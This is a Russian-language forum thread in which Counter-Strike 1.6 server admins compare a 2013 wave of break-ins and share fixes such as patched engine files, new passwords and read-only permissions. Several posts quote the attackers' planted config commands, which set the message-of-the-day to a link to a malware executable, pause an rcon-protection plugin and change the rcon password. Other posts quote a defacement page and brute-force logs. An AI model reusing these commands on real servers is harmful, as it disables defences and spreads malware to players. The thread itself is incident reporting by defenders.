Важная информация

Перед тем как создать тему или задать вопрос, ознакомьтесь с данной темой, там собраны наиболее распространенные уязвимости и способы устранения.
Так же не поленитесь воспользоваться поиском, вполне возможно, что ваш вопрос уже поднимался на форуме.
При создании новой темы уделите внимание ее названию, оно должно кратко описывать суть вашего вопроса/проблемы. Все вновь созданные темы с названиями "Помогите", "Объясните", "Подскажите" и т.д. будут удалены, а их авторы наказаны.

Залили на сервер exec.cfg

Опции

klient	19.6.2013, 9:11 Сообщение #341
Стаж: 19 лет Сообщений: 42 Благодарностей: 6 Полезность: 111	Цитата(mazdan @ 19.6.2013, 10:00) zippel, заплатка фиксит конкретную багу. Как это подгрузили вам на сервер мы явно не можем знать и данных у вас по этому вопросу больше. При чем тут логи дропов фейковых игроков - вообще не ясно. Вариантов как могли залить файлы очень много. Тот же самый психостатс - его если не удалили. Баги и заплатки собраны в одно сообщение. Если уверены что это у вас новое что-то, ну создайте отдельную тему тогда. Если нет желания ставить пропатченную сошку - есть вариант на орфее или какие-то подобные методы защиты. Вас интересуют аналоги защиты что ли? Если вам не подходит то что есть - сделайте что-то для себя. Плагин, который будет за файлами следить, за рконом, за плагинами. Большая часть подобных вопросов заканчивается "ой, фтп пароль слили", "ой, плагин с бекдором" и т.п. А тут собственно вы защиту не ставили - могли чего угодно назаливать, потом плагины поподменять и т.п. Так а если сошка стоит с прошлого года? психостатс стоит на отдельной машине, логи собираются не по ФТП! так что красть нечего, да и фтп демон на сервере не запущен. и защита стоит в полном объёме..
	Поблагодарили 0 раз Поблагодарили 0 раз

Safety1st	19.6.2013, 9:11 Сообщение #342
Стаж: 14 лет Город: Moscow Сообщений: 7228 Благодарностей: 8071 Полезность: 196	Цитата(zippel @ 19.6.2013, 11:04) все короче ясно.. скажу вам одно, после дропов упал сервер с ошибкой во время вызова процедуры (не успел замеить какой именно), виновником была либа fakemeta. все короче ясно.. скажу вам одно, виновником были чьи-то кривые руки: сисопа сервера либо быдлокодера говноплагина, но никак не ошибка в модуле fakemeta. Отредактировал: Safety1st, - 19.6.2013, 9:12
	Поблагодарили 0 раз Поблагодарили 0 раз

zippel	19.6.2013, 9:16 Сообщение #343
Стаж: 17 лет Сообщений: 918 Благодарностей: 105 Полезность: 1	Цитата(mazdan @ 19.6.2013, 10:10) как это связано с текущей проблемой не понятно да че ты прицепился к этим дропам, не связаны.
	Поблагодарили 0 раз Поблагодарили 0 раз

noisiacs	24.6.2013, 11:06 Сообщение #344
Стаж: 13 лет Сообщений: 684 Благодарностей: 162 Полезность: 204	от залива exec.cfg помогает патченая сошка от Крока?
	Поблагодарили 0 раз Поблагодарили 0 раз

noisiacs	24.6.2013, 12:49 Сообщение #345
Стаж: 13 лет Сообщений: 684 Благодарностей: 162 Полезность: 204	в общем после установки патченной сошки пришлось сменить все пароли. Пока что тишина, конфигов левых нет.
	Поблагодарили 0 раз Поблагодарили 0 раз

Metal Messiah	24.6.2013, 22:23 Сообщение #346
Стаж: 13 лет Сообщений: 2458 Благодарностей: 1482 Полезность: 770 HostGame.cf	Цитата motdfile motd.txt motd_write http://zeal1209.no-ip.*/cstrike.exe //zhenya amxx pause rcon_defencer.amxx rcon_password ***** Женя, найду - яйки оторву будешь бегать вокруг дома радоваться что имя в паспорте менять не прийдется на женское. Сегодня рано утром сломаны с десяток серверов на августовском билде, в том числе мои, действовали явно проходом по VALVE MS потому как среди серверов есть один который вообще никуда не добавлялся (я готовлю капитальное обновление и плагины отлаживаю на новом VPS). В частности, на одном есть metamod/exec.cfg и config/maps/, на другом нет но при этом motd_write сделан успешно. Собсно проснулся я после того как одновременно 2 сервера находящихся в разных ДЦ завалились с ошибкой Цитата [ANTI-DLFILE] Patch "cmd dlfile" failed. и cant status not connected Пока мы все восстановили, завтра слезу с мобильного интернета на нормальный и возьмусь за этого Женю капитально. Отредактировал:* Metal Messiah, - 24.6.2013, 22:31 Полезные публикации - ссылки у меня в профиле. Ссылка на плагин против спама на сервере StopServerSpam там же.
	Поблагодарили 0 раз Поблагодарили 0 раз

Paster	25.6.2013, 11:13 Сообщение #347
Стаж: 19 лет Сообщений: 491 Благодарностей: 64 Полезность: 139	Да, подтверждаю такое *: Код motdfile motd.txt motd_write http://zeal**/cstrike.exe amxx pause rcon_defencer.amxx rcon_password ** Защита стояла вся (плагины, сошка, iptables и т.д.), не спасает. Отредактировал:** Paster, - 25.6.2013, 11:55
	Поблагодарили 0 раз Поблагодарили 0 раз

Metal Messiah	25.6.2013, 11:27 Сообщение #348
Стаж: 13 лет Сообщений: 2458 Благодарностей: 1482 Полезность: 770 HostGame.cf	Пока копаю, но в одном серве слили конфиг (есть ztmp), в другом возможно подобрали пароль. Но я не исключаю нового сплоита. Кто (amx или umm) запускает config/maps/.cfg не знаю но видимо надо убрать это т.к. никто не пользуется. я уже слил взломанный сервак архивом себе, сейчас буду разбираться и читать логи. P.S. брутеры активизировались сильно, какой-то переполох видимо. Раньше было стабильно раз в минуту ошибка ркона, теперь раз в несколько секунд и всегда с разных IP. Причем софт разный. Полезные публикации - ссылки у меня в профиле. Ссылка на плагин против спама на сервере StopServerSpam* там же.
	Поблагодарили 0 раз Поблагодарили 0 раз

Paster	25.6.2013, 11:36 Сообщение #349
Стаж: 19 лет Сообщений: 491 Благодарностей: 64 Полезность: 139	Да, папка была создана addons/amxmodx/configs/maps - плагина UMM не было на борту сервера!!! Удалил файлы, поставил пока папку на чтение. Эта дырка по сути скорее всего новая, т.к. engine_i686.so не помогает. Отредактировал: Paster, - 25.6.2013, 11:38
	Поблагодарили 0 раз Поблагодарили 0 раз

Metal Messiah	25.6.2013, 11:47 Сообщение #350
Стаж: 13 лет Сообщений: 2458 Благодарностей: 1482 Полезность: 770 HostGame.cf	Я из под root обнулил создаваемые файлы и запретил запись кроме рута. Сервер запускается из под юзера, так что даже если будет рецидив (пока вроде не было хотя брут продолжается, хрен они сбрутят 20-значный пароль) при успешном рконе записать ничего не смогут. Вопрос только ничего не создастся или сервак выпадет с ошибкой и перезапустится. Не проверял. Полезные публикации - ссылки у меня в профиле. Ссылка на плагин против спама на сервере StopServerSpam там же.
	Поблагодарили 0 раз Поблагодарили 0 раз

Paster	25.6.2013, 11:53 Сообщение #351
Стаж: 19 лет Сообщений: 491 Благодарностей: 64 Полезность: 139	С правами r--r--r-- motd.txt не получилось изменить, глянем что с папкой maps будет происходить...
	Поблагодарили 0 раз Поблагодарили 0 раз

noisiacs	25.6.2013, 12:07 Сообщение #352
Стаж: 13 лет Сообщений: 684 Благодарностей: 162 Полезность: 204	этот же самый мдк и мне залил свою фигню. Выше уже писал, что пришлось сменить все пассы начиная с ркона и заканчивая на мускульных базах. Сутки уже тихо.
	Поблагодарили 0 раз Поблагодарили 0 раз

Shurik_7773.cfg	25.6.2013, 14:23 Сообщение #353
Стаж: 13 лет Сообщений: 80 Благодарностей: 8 Полезность: 82	Цитата(Paster @ 25.6.2013, 11:36) Да, папка была создана addons/amxmodx/configs/maps - плагина UMM не было на борту сервера!!! А что Система смены карт UMM дырявая ? А то у меня стоит она .
	Поблагодарили 0 раз Поблагодарили 0 раз

Shurik_7773.cfg	25.6.2013, 14:54 Сообщение #354
Стаж: 13 лет Сообщений: 80 Благодарностей: 8 Полезность: 82	Кстати вот нашёл что конфиги галить не могут , и пытаются очень сильно ! Ignoring non-customization file upload of addons\metamod\exec.cfg Из файла qconsole.log Отредактировал: Shurik_7773.cfg, - 25.6.2013, 14:55
	Поблагодарили 0 раз Поблагодарили 0 раз

Paster	25.6.2013, 16:09 Сообщение #355
Стаж: 19 лет Сообщений: 491 Благодарностей: 64 Полезность: 139	Цитата(Shurik_7773.cfg @ 25.6.2013, 15:23) А что Система смены карт UMM дырявая ? А то у меня стоит она . Не нужно писать ложную информацию. UMM имеет паппку конфигов /cstrike/addons/amxmodx/configs/umm/maps А конфиги с вирусом прописываются в файлах /cstrike/addons/amxmodx/configs/maps Как я писал выше, данный способ взлома совершен без UMM менеджера. Отредактировал: Paster, - 25.6.2013, 16:13
	Поблагодарили 1 раз Поблагодарили 1 раз Shurik_7773.cfg

myself777	25.6.2013, 16:47 Сообщение #356
Стаж: 12 лет Сообщений: 88 Благодарностей: 71 Полезность: < 0	У меня такая же проблема кто то ставит на motd.txt картинку. engine_i686.so не помогает Скрытый текст <html><meta http-equiv="content-type" content="text/html; charset=windows-1251"><center><h1>PwNeD by AzazeL.</h1><h2>Chernomorets - Odessa RULEZZ</h2><img src="http://25.media.tumblr.com/9342795897ff09b4d4a8dd1dc74ae92f/tumblr_mm8657yoWl1rg83rpo1_1280.jpg"><br>botnet romana suge pula</center>#409</html> Отредактировал: myself777, - 25.6.2013, 16:47
	Поблагодарили 0 раз Поблагодарили 0 раз

myself777	25.6.2013, 17:21 Сообщение #357
Стаж: 12 лет Сообщений: 88 Благодарностей: 71 Полезность: < 0	rcon 248328967 "Server" echo HLBrute by ZeaL Скрытый текст L 06/25/2013 - 17:22:05: Bad Rcon: "rcon 248328967 "Server" echo HLBrute by ZeaL" from "119.48.151.155:27005" L 06/25/2013 - 17:22:09: World triggered "Round_Start" Bad Rcon from 95.57.27.139:27006: rcon 1785362281 "000555" echo HLBrute by ZeaL L 06/25/2013 - 17:23:19: Bad Rcon: "rcon 1785362281 "000555" echo HLBrute by ZeaL" from "95.57.27.139:27006" Bad Rcon from 27.123.213.145:27005: rcon 434286348 "000777" echo HLBrute by ZeaL L 06/25/2013 - 17:24:06: Bad Rcon: "rcon 434286348 "000777" echo HLBrute by ZeaL" from "27.123.213.145:27005"
	Поблагодарили 0 раз Поблагодарили 0 раз

Metal Messiah	25.6.2013, 21:59 Сообщение #358
Стаж: 13 лет Сообщений: 2458 Благодарностей: 1482 Полезность: 770 HostGame.cf	У меня в начале июня на серве винт полетел и с тех пор "временая" сборка КС стоит - логи были отключены так что как попали конфиги при условии что motd_write в .cfg не пишет - не знаю. Shurik_7773.cfg прояснил ситуацию. Цитата(myself777) У меня такая же проблема кто то ставит на motd.txt картинку ну дык ясно ж написано PwNeD by AzazeL это кстати не такая же проблема, у всех тут в мотд"е ссылка на EXEшник с вирусом который я собрался завтра реверсить (пардон не сегодня, ночью безсоница мучала в 5 утра лег и весь день на кофе с колой сижу) а у тебя картинка так что радуйся Отредактировал: Metal Messiah, - 25.6.2013, 22:01 Полезные публикации - ссылки у меня в профиле. Ссылка на плагин против спама на сервере StopServerSpam там же.
	Поблагодарили 0 раз Поблагодарили 0 раз

myself777	25.6.2013, 22:15 Сообщение #359
Стаж: 12 лет Сообщений: 88 Благодарностей: 71 Полезность: < 0	Цитата(Metal Messiah @ 25.6.2013, 23:59) У меня в начале июня на серве винт полетел и с тех пор "временая" сборка КС стоит - логи были отключены так что как попали конфиги при условии что motd_write в .cfg не пишет - не знаю. Shurik_7773.cfg прояснил ситуацию. ну дык ясно ж написано PwNeD by AzazeL это кстати не такая же проблема, у всех тут в мотд"е ссылка на EXEшник с вирусом который я собрался завтра реверсить (пардон не сегодня, ночью безсоница мучала в 5 утра лег и весь день на кофе с колой сижу) а у тебя картинка так что радуйся Как то стыдно перед игроками , не только картинка в прочем вирус тоже заливают. Отредактировал: myself777, - 25.6.2013, 22:17
	Поблагодарили 0 раз Поблагодарили 0 раз

Shurik_7773.cfg	26.6.2013, 0:44 Сообщение #360
Стаж: 13 лет Сообщений: 80 Благодарностей: 8 Полезность: 82	Цитата(myself777 @ 25.6.2013, 18:21) rcon 248328967 "Server" echo HLBrute by ZeaL Скрытый текст L 06/25/2013 - 17:22:05: Bad Rcon: "rcon 248328967 "Server" echo HLBrute by ZeaL" from "119.48.151.155:27005" L 06/25/2013 - 17:22:09: World triggered "Round_Start" Bad Rcon from 95.57.27.139:27006: rcon 1785362281 "000555" echo HLBrute by ZeaL L 06/25/2013 - 17:23:19: Bad Rcon: "rcon 1785362281 "000555" echo HLBrute by ZeaL" from "95.57.27.139:27006" Bad Rcon from 27.123.213.145:27005: rcon 434286348 "000777" echo HLBrute by ZeaL L 06/25/2013 - 17:24:06: Bad Rcon: "rcon 434286348 "000777" echo HLBrute by ZeaL" from "27.123.213.145:27005" Отключи иркон пароль ! И забудь про эти сообщения !
	Поблагодарили 0 раз Поблагодарили 0 раз

« Предыдущая тема · Защита Игрового сервера · Следующая тема »

0 пользователей и 1 гостей читают эту тему:

Наши новости:

Важная информация

Залили на сервер exec.cfg